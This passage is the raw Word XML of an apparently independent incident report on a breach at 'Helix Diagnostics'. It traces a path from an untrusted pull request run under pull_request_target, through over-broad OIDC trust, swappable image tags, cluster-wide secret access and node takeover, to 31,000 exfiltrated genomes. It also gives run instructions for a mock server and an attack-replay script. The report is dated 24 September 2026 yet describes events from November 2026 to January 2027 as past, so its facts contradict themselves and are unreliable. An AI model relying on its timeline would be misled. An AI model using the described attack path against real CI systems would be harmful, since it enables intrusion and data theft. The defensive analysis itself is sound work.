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864"/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>Helix Diagnostics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Incident reconstruction + root-cause analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>From an anonymous pull request to 31,000 genomes on the open internet — what happened, how we proved it, and how to stop it happening again.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>24 September 2026  •  Independent security review  •  Includes working mock prototype + attack replay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Package: this report (DOCX/PDF) + prototype/ (mock server + attacker script) + docs/ (plain-English guides)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive summary — the story in two pages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>2. How to use this package</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>3. System architecture (as breached)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>4. Findings F1–F32 — what matters, what helped, what's noise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>5. What happened, how it happened, and why</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>6. Kill-chain (11 steps, with tools and evidence)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>7. Mock prototype + hack simulation — how we proved it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>8. What we honestly couldn't prove</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>9. Fix list — what to do Monday morning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix A — simulation log (excerpts)   B — file manifest   C — glossary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>This wasn't one bug. It was five reasonable-sounding decisions that, put together, left a straight corridor from the public internet to Helix's most sensitive data. No password was stolen. No key leaked. No logs were wiped. Every step the attacker took was done by a legitimate identity doing something it was technically allowed to do. That's exactly why it worked — and why the monitoring setup, which was built to catch stolen passwords and switched-off logging, never stood a chance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>In short: a stranger filed a routine-looking contribution to a public Helix code project. Helix's automation ran it with Helix's own credentials before anyone reviewed it. Those credentials were far too broad, so the stranger traded them up, twice, until they could quietly replace a shared building block, read every secret in the production cluster, break out onto the underlying machines, and copy 31,000 whole genome sequences to an address of their choosing. Two alarms rang at the right time. Both were closed as 'probably fine.' Helix found out a month later, from a stranger who recognised their file naming.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>31,000 whole genome sequences exfiltrated (19 Nov 2026 – 6 Jan 2027) and published on a public research repository (11 Jan 2027).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Data is permanently identifying, can't be reissued, and implicates relatives — held under contract to 40 hospital groups covering ~210,000 people.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Discovery was accidental and external (18 Jan 2027), not from any Helix control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Runner fleet and cluster secrets must be assumed compromised; node-level access was achieved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Root causes (the six doors)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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Door left open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fix in one line</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Strangers' code runs with your secrets before review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F3 (+F2, F27)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Split trusted/untrusted CI; approve first-time contributors before running</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>One trust rule accepts the whole org</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pin trust to exact repo + workflow + ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Shared image tag can be silently swapped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Immutable tags; pin by digest; sign images</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Every workload can read every secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F12 + F13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Delete stale binding; least-privilege; no default automount</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No bouncer blocks node-takeover pods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Admission control denying privileged+hostPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Export can deliver anywhere</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Allow-list destinations; require matching lab order</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Underneath those six sits a governance gap: three role hand-offs were approved by three people in three years and nobody ever traced what they added up to (F25/F26). The yearly security test excludes the two systems the whole attack lived in (F28), and the watch team's handbook describes threats from a different era (F23) while they can't even see the relevant logs (F32).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>What this package proves</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>We rebuilt the estate as a small mock server (prototype/app.py, no cloud needed) with dummy data but the real logic — wildcard trust, mutable tags, stale Kubernetes binding, unscoped export — and replayed the attack end to end (prototype/attacker.py). Every step in this report was executed against that mock; the log is in Appendix A and the full files ship in the ZIP. Flip the server to FIXED=true and every exploit step is denied, which is also how we validated the fixes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. How to use this package</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>If you're technical, start with the prototype — it makes the report click. If you're not, read sections 1 and 5 first, then look at the diagram in section 3.</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You are…</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Do this</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Board / leadership</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Read §1 + §5 + §9; glance at the diagram</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>20 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Run prototype/attacker.py, then read §6 + §7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>45 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOC / analyst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Read §4 (Bucket 2) + §6 steps 7–9 + §9 detections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Auditor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Read §4 + §8; check Appendix B manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>To run the demo (any laptop with Python 3.9+; no packages needed):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>cd prototype</w:t>
        <w:br/>
        <w:t>python3 app.py              # terminal 1 — vulnerable mock on http://localhost:8471</w:t>
        <w:br/>
        <w:t>python3 attacker.py         # terminal 2 — replays all 11 kill-chain steps</w:t>
        <w:br/>
        <w:t># then:  FIXED=true python3 app.py  +  python3 attacker.py   # every step denied</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. System architecture (as breached)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>The diagram below is the whole estate on one page. Follow the red arrows 1–9 in order — that's the attacker's walk. Grey boxes are the detection context (why nobody stopped them). The mock prototype mirrors this exactly; endpoint names are printed under the diagram.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5852160" cy="353655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852160" cy="3536557"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Figure 1 — Helix architecture as breached, with the attack path overlaid. (File: prototype/architecture.png)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Components and trust boundaries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28"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Account / home</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>What it does</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trust flaw</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helix-seqtools (GitHub)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public toolbox; runs CI on PRs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pull_request_target = attacker code + base secrets (F3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Runner fleet (x4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helix-build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Runs CI jobs with registry access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Long-lived, sticky; no runtime telemetry (F7/F8/F15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HelixDeploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helix-build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deployment role via OIDC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Trusts whole org repo:helix-diagnostics/* (F5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HelixPipelineOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helix-build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pipeline ops; pushes images</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reachable from Deploy; hop never mapped (F25)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Registry (base/stable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>helix-build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Base images for pipelines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
